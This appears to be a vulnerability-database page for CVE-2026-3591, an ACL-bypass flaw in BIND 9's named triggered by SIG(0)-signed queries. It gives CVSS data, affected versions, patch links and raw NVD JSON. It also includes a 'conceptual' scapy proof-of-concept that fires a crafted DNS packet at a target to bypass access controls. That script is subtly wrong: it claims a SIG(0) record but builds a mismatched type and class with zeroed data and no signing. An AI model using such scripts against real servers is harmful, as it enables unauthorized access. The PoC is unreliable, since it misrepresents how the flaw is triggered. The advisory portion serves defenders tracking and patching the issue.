Security Vulnerability Report
CVE-2026-3591 CVSS 5.4 MEDIUM

Published: 2026-03-25 14:16:37
Last Modified: 2026-05-21 15:24:36

Description

A use-after-return vulnerability exists in the `named` server when handling DNS queries signed with SIG(0). Using a specially-crafted DNS request, an attacker may be able to cause an ACL to improperly (mis)match an IP address. In a default-allow ACL (denying only specific IP addresses), this may lead to unauthorized access. Default-deny ACLs should fail-secure. This issue affects BIND 9 versions 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, and 9.20.9-S1 through 9.20.20-S1. BIND 9 versions 9.18.0 through 9.18.46 and 9.18.11-S1 through 9.18.46-S1 are NOT affected.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:* (from 9.20.0 inclusive, up to 9.20.21 exclusive) - VULNERABLE
cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:* (from 9.21.0 inclusive, up to 9.21.20 exclusive) - VULNERABLE
BIND 9 9.20.0 - 9.20.20
BIND 9 9.21.0 - 9.21.19
BIND 9 9.20.9-S1 - 9.20.20-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2026-3591 (Conceptual)
# Requires: scapy
# Description: Sends a SIG(0) signed DNS query to trigger the ACL mismatch.
from scapy.all import *
import random


def send_exploit(target_ip):
    # Construct a DNS query with SIG(0) record
    # Note: Actual cryptographic signing is omitted for brevity; focus on structure.
    domain = "example.com"

    # Craft packet with specific SIG(0) characteristics to trigger use-after-return
    pkt = IP(dst=target_ip)/UDP(dport=53)/DNS(
        rd=1,
        qd=DNSQR(qname=domain),
        # Adding additional/authority section with SIG(0) to trigger the path
        ar=DNSRR(
            rrname=domain,
            type=255,
            rclass=3,
            ttl=0,
            # Malformed data to attempt triggering the vulnerability
            rdata=b'\x00' * 64
        )
    )

    print(f"[*] Sending crafted packet to {target_ip}...")
    send(pkt)
    print("[*] Packet sent. Check if ACL was bypassed.")


if __name__ == "__main__":
    target = "192.168.1.100"  # Replace with actual target
    send_exploit(target)
```

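References

https://downloads.isc.org/isc/bind9/9.20.21 - Patch
https://downloads.isc.org/isc/bind9/9.21.20 - Patch
https://kb.isc.org/docs/cve-2026-3591 - Vendor Advisory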

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3591", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:37.297", "lastModified": "2026-05-21T15:24:36.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A use-after-return vulnerability exists in the `named` server when handling DNS queries signed with SIG(0). Using a specially-crafted DNS request, an attacker may be able to cause an ACL to improperly (mis)match an IP address. In a default-allow ACL (denying only specific IP addresses), this may lead to unauthorized access. Default-deny ACLs should fail-secure.\nThis issue affects BIND 9 versions 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, and 9.20.9-S1 through 9.20.20-S1.\nBIND 9 versions 9.18.0 through 9.18.46 and 9.18.11-S1 through 9.18.46-S1 are NOT affected."}, {"lang": "es", "value": "Una vulnerabilidad de use-after-return existe en el servidor 'named' al manejar consultas DNS firmadas con SIG(0). Usando una solicitud DNS especialmente diseñada, un atacante podría ser capaz de hacer que una ACL haga una coincidencia incorrecta con una dirección IP. En una ACL de permiso predeterminado (negando solo direcciones IP específicas), esto podría llevar a acceso no autorizado. 
Las ACL de denegación predeterminada deberían fallar de forma segura.\nEste problema afecta a las versiones de BIND 9 9.20.0 a 9.20.20, 9.21.0 a 9.21.19, y 9.20.9-S1 a 9.20.20-S1.\nLas versiones de BIND 9 9.18.0 a 9.18.46 y 9.18.11-S1 a 9.18.46-S1 NO están afectadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-305"}, {"lang": "en", "value": "CWE-562"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.20.0", "versionEndExcluding": "9.20.21", "matchCriteriaId": "2C0EF5D0-68A6-4E00-985B-523D9B243E49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.21.0", "versionEndExcluding": "9.21.20", "matchCriteriaId": "B1DD0950-5CBD-49B2-8007-5E96B3C4FB1B"}]}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.20.21", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://downloads.isc.org/isc/bind9/9.21.20", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.isc.org/docs/cve-2026-3591", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}